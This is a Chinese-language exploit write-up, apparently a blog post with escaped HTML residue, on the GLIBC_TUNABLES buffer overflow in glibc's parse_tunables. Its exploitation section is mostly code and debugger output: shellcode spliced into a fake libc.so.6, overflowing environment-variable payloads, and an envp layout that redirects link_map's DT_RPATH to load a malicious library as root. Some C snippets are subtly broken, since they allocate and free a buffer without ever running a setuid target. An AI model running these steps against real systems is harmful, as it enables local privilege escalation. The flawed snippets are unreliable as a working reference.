GLIBC_TUNABLES 环境变量缓冲区溢出漏洞分析与利用<\/h1>

漏洞概述<\/h2>
这是一个存在于 glibc 中的缓冲区溢出漏洞，影响版本包括：<\/p>
glibc 2.35-0ubuntu3 (aarch64)<\/li>
glibc 2.36-9+deb12u2 (amd64)<\/li> <\/ul>
漏洞发生在 GLIBC_TUNABLES 环境变量处理过程中，攻击者可以通过精心构造的环境变量值触发缓冲区溢出，最终可能导致权限提升。<\/p>
漏洞原理<\/h2>

关键函数分析<\/h3>
漏洞主要存在于 elf\/dl-tunables.c<\/code> 文件中的 parse_tunables<\/code> 函数：<\/p>
static<\/span> void<\/span> parse_tunables<\/span>(char<\/span> *<\/span>tunestr, char<\/span> *<\/span>valstring) {
<\/span><\/span>    if<\/span> (tunestr ==<\/span> NULL ||<\/span> *<\/span>tunestr ==<\/span> '\0'<\/span>)
<\/span><\/span>        return<\/span>;
<\/span><\/span>    
<\/span><\/span>    char<\/span> *<\/span>p =<\/span> tunestr;
<\/span><\/span>    size_t off =<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    while<\/span> (true) {
<\/span><\/span>        char<\/span> *<\/span>name =<\/span> p;
<\/span><\/span>        size_t len =<\/span> 0<\/span>;
<\/span><\/span>        
<\/span><\/span>        \/* First, find where the name ends. *\/<\/span>
<\/span><\/span>        while<\/span> (p[len] !=<\/span> '='<\/span> &&<\/span> p[len] !=<\/span> ':'<\/span> &&<\/span> p[len] !=<\/span> '\0'<\/span>)
<\/span><\/span>            len++<\/span>;
<\/span><\/span>        
<\/span><\/span>        \/* If we reach the end of the string before getting a valid name-value pair, bail out. *\/<\/span>
<\/span><\/span>        if<\/span> (p[len] ==<\/span> '\0'<\/span>) {
<\/span><\/span>            if<\/span> (__libc_enable_secure)
<\/span><\/span>                tunestr[off] =<\/span> '\0'<\/span>;
<\/span><\/span>            return<\/span>;
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        \/* We did not find a valid name-value pair before encountering the colon. *\/<\/span>
<\/span><\/span>        if<\/span> (p[len]==<\/span> ':'<\/span>) {
<\/span><\/span>            p +=<\/span> len +<\/span> 1<\/span>;
<\/span><\/span>            continue<\/span>;
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        p +=<\/span> len +<\/span> 1<\/span>;
<\/span><\/span>        \/* Take the value from the valstring since we need to NULL terminate it. *\/<\/span>
<\/span><\/span>        char<\/span> *<\/span>value =<\/span> &<\/span>valstring[p -<\/span> tunestr];
<\/span><\/span>        len =<\/span> 0<\/span>;
<\/span><\/span>        
<\/span><\/span>        while<\/span> (p[len] !=<\/span> ':'<\/span> &&<\/span> p[len] !=<\/span> '\0'<\/span>)
<\/span><\/span>            len++<\/span>;
<\/span><\/span>        
<\/span><\/span>        \/* Add the tunable if it exists. *\/<\/span>
<\/span><\/span>        for<\/span> (size_t i =<\/span> 0<\/span>; i <<\/span> sizeof<\/span>(tunable_list) \/<\/span> sizeof<\/span>(tunable_t); i++<\/span>) {
<\/span><\/span>            tunable_t *<\/span>cur =<\/span> &<\/span>tunable_list[i];
<\/span><\/span>            if<\/span> (tunable_is_name(cur-><\/span>name, name)) {
<\/span><\/span>                \/* If we are in a secure context (AT_SECURE) then ignore the tunable unless it is explicitly marked as secure. *\/<\/span>
<\/span><\/span>                if<\/span> (__libc_enable_secure) {
<\/span><\/span>                    if<\/span> (cur-><\/span>security_level !=<\/span> TUNABLE_SECLEVEL_SXID_ERASE) {
<\/span><\/span>                        if<\/span> (off ><\/span> 0<\/span>)
<\/span><\/span>                            tunestr[off++<\/span>] =<\/span> ':'<\/span>;
<\/span><\/span>                        const<\/span> char<\/span> *<\/span>n =<\/span> cur-><\/span>name;
<\/span><\/span>                        while<\/span> (*<\/span>n !=<\/span> '\0'<\/span>)
<\/span><\/span>                            tunestr[off++<\/span>] =<\/span> *<\/span>n++<\/span>;
<\/span><\/span>                        tunestr[off++<\/span>] =<\/span> '='<\/span>;
<\/span><\/span>                        for<\/span> (size_t j =<\/span> 0<\/span>; j <<\/span> len; j++<\/span>)
<\/span><\/span>                            tunestr[off++<\/span>] =<\/span> value[j];
<\/span><\/span>                    }
<\/span><\/span>                    if<\/span> (cur-><\/span>security_level !=<\/span> TUNABLE_SECLEVEL_NONE)
<\/span><\/span>                        break<\/span>;
<\/span><\/span>                }
<\/span><\/span>                value[len] =<\/span> '\0'<\/span>;
<\/span><\/span>                tunable_initialize(cur, value);
<\/span><\/span>                break<\/span>;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        if<\/span> (p[len] !=<\/span> '\0'<\/span>)
<\/span><\/span>            p +=<\/span> len +<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞触发条件<\/h3>

当 __libc_enable_secure<\/code> 启用时（在安全上下文中）<\/li>
处理 GLIBC_TUNABLES<\/code> 环境变量<\/li>
环境变量值长度超过分配的内存空间<\/li>
<\/ol>
漏洞形成过程<\/h3>

存在一个名为 GLIBC_TUNABLES<\/code> 的环境变量<\/li>
该环境变量的值使用 tunables_strdup<\/code> 函数进行处理（类似于 strdup<\/code>）<\/li>
此时 libc 还没有初始化完成，使用的是 __minimal_malloc<\/code> 分配内存<\/li>
调用 parse_tunables<\/code> 函数处理环境变量值<\/li>
当 __libc_enable_secure<\/code> 启用且安全等级不是 TUNABLE_SECLEVEL_SXID_ERASE<\/code> 时，会对环境变量进行处理<\/li>
处理过程中没有正确检查边界，导致缓冲区溢出<\/li>
<\/ol>
漏洞利用<\/h2>
利用思路<\/h3>

通过修改 GLIBC_TUNABLES<\/code> 的值来替换 libc 的加载路径<\/li>
加载攻击者修改过的恶意库<\/li>
找到一个合适的栈地址来覆盖原始的 libc 加载路径<\/li>
使用 ASLR 关闭的方式来尝试利用该漏洞<\/li>
<\/ol>
关键利用代码<\/h3>
with<\/span> open(hax_path["path"<\/span>] +<\/span> b<\/span>"\/libc.so.6"<\/span>, "wb"<\/span>) as<\/span> fh:
<\/span><\/span>    fh.<\/span>write(libc_e.<\/span>d[0<\/span>:__libc_start_main])
<\/span><\/span>    fh.<\/span>write(shellcode)
<\/span><\/span>    fh.<\/span>write(libc_e.<\/span>d[__libc_start_main +<\/span> len(shellcode):])
<\/span><\/span><\/code><\/pre>利用步骤详解<\/h3>

构造恶意环境变量<\/strong>：<\/li>
<\/ol>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> *<\/span>__minimal_malloc<\/span>(size_t size) {
<\/span><\/span>    return<\/span> malloc(size);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    char<\/span> fill[0xd00<\/span>];
<\/span><\/span>    const<\/span> char<\/span> *<\/span>prefix =<\/span> "GLIBC_TUNABLES=glibc.malloc.mxfast="<\/span>;
<\/span><\/span>    strcpy(fill, prefix);
<\/span><\/span>    size_t prefixLength =<\/span> strlen(prefix);
<\/span><\/span>    
<\/span><\/span>    for<\/span> (size_t i =<\/span> prefixLength; i <<\/span> sizeof<\/span>(fill) -<\/span> 1<\/span>; i++<\/span>) {
<\/span><\/span>        fill[i] =<\/span> 'A'<\/span>;
<\/span><\/span>    }
<\/span><\/span>    fill[sizeof<\/span>(fill) -<\/span> 1<\/span>] =<\/span> '\0'<\/span>;
<\/span><\/span>    
<\/span><\/span>    void<\/span> *<\/span>allocatedMemory =<\/span> __minimal_malloc(0xd00<\/span> +<\/span> 1<\/span>);
<\/span><\/span>    free(allocatedMemory);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
内存布局分析<\/strong>：<\/li>
<\/ol>
RAX 0x7f4109f8f2e0 ?— 0x0
pwndbg> vmmap
0x7f4109f8c000 0x7f4109f90000 rw-p 4000 37000 \/usr\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2

> hex(0x7f4109f8f2e0 + 0xd01)
'0x7f4109f8ffe1'
> hex(0x7f4109f90000 - 0x7f4109f8ffe1)
'0x1f'
<\/code><\/pre>

覆盖 link_map 结构<\/strong>：<\/li>
<\/ol>
攻击目标是 struct link_map<\/code> 的 l_info[DT_RPATH]<\/code> 成员变量：<\/p>
struct<\/span> link_map {
<\/span><\/span>    ElfW(Addr) l_addr;
<\/span><\/span>    char<\/span> *<\/span>l_name;
<\/span><\/span>    ElfW(Dyn) *<\/span>l_ld;
<\/span><\/span>    struct<\/span> link_map *<\/span>l_next, *<\/span>l_prev;
<\/span><\/span>    struct<\/span> link_map *<\/span>l_real;
<\/span><\/span>    Lmid_t l_ns;
<\/span><\/span>    struct<\/span> libname_list *<\/span>l_libname;
<\/span><\/span>    ElfW(Dyn) *<\/span>l_info[DT_NUM +<\/span> DT_THISPROCNUM +<\/span> DT_VERSIONTAGNUM +<\/span> DT_EXTRANUM +<\/span> DT_VALNUM +<\/span> DT_ADDRNUM];
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
控制 DT_RPATH<\/strong>：<\/li>
<\/ol>
DT_RPATH<\/code> 是 ELF 文件中的动态链接器标签，用于指定运行时搜索共享库的目录路径。通过覆盖 link_map->l_info[DT_RPATH]<\/code> 可以控制库加载路径。<\/p>

构造 payload<\/strong>：<\/li>
<\/ol>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span>*<\/span> __minimal_malloc<\/span>(size_t size) {
<\/span><\/span>    return<\/span> malloc(size);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    char<\/span> *<\/span>payload =<\/span> (char<\/span>*<\/span>)__minimal_malloc(PAYLOAD_SIZE);
<\/span><\/span>    const<\/span> char<\/span> *<\/span>prefix =<\/span> "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast="<\/span>;
<\/span><\/span>    strcpy(payload, prefix);
<\/span><\/span>    size_t prefixLength =<\/span> strlen(prefix);
<\/span><\/span>    
<\/span><\/span>    for<\/span> (size_t i =<\/span> prefixLength; i <<\/span> PAYLOAD_SIZE -<\/span> 1<\/span>; i++<\/span>) {
<\/span><\/span>        payload[i] =<\/span> 'B'<\/span>;
<\/span><\/span>    }
<\/span><\/span>    payload[PAYLOAD_SIZE -<\/span> 1<\/span>] =<\/span> '\0'<\/span>;
<\/span><\/span>    
<\/span><\/span>    free(payload);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
调试观察<\/strong>：<\/li>
<\/ol>
*RAX 0x7f4908e74c40 ?— 0x0
pwndbg> p *((struct link_map *)$rax)
$1 = {
    l_addr = 4774451407232463713, 
    l_name = 0x4242424242424242 <error: Cannot access memory at address 0x4242424242424242>,
    l_ld = 0x4242424242424242,
    l_next = 0x4242424242424242,
    l_prev = 0x4242424242424242,
    l_real = 0x4242424242424242,
    l_ns = 4774451407313060418,
    l_libname = 0x4242424242424242,
    l_info = {
        0x4242424242424242 <repeats 17 times>,
        0x696c673a42424242,
        0x6f6c6c616d2e6362,
        0x74736166786d2e63,
        0x3d,
        0x0 <repeats 24 times>,
        0x2e6362696c673a00,
        0x6d2e636f6c6c616d,
        0x3d7473616678,
        0x0 <repeats 29 times>
    },
    \/\/ ...
}
<\/code><\/pre>

最终利用<\/strong>：<\/li>
<\/ol>
通过精确控制内存布局，将 link_map->l_info[DT_RPATH]<\/code> 指向攻击者控制的路径，从而加载恶意库：<\/p>
for<\/span> (int<\/span> i =<\/span> 2<\/span>; i<<\/span>ENVP_SIZE-<\/span>1<\/span>; i++<\/span>)
<\/span><\/span>    envp[i] =<\/span> ""<\/span>;
<\/span><\/span>envp[0x20<\/span> +<\/span> 0xb8<\/span>] =<\/span> "<\/span>\x28\x40\x40<\/span>"<\/span>;
<\/span><\/span><\/code><\/pre>漏洞修复<\/h2>

在 parse_tunables<\/code> 函数中添加边界检查<\/li>
确保在处理环境变量时不会越界写入<\/li>
更新到修复后的 glibc 版本<\/li>
<\/ol>
总结<\/h2>
该漏洞利用 GLIBC_TUNABLES 环境变量处理过程中的缓冲区溢出，通过精心构造的环境变量值覆盖关键内存结构，最终实现加载恶意库并获取 root 权限。漏洞利用的关键在于：<\/p>

理解 parse_tunables<\/code> 函数的处理逻辑<\/li>
控制 link_map<\/code> 结构的 l_info[DT_RPATH]<\/code> 成员<\/li>
精确计算内存布局和偏移<\/li>
构造能够触发溢出的环境变量值<\/li>
<\/ol>
此漏洞展示了环境变量处理不当可能带来的严重后果，特别是在系统库的早期初始化阶段。<\/p>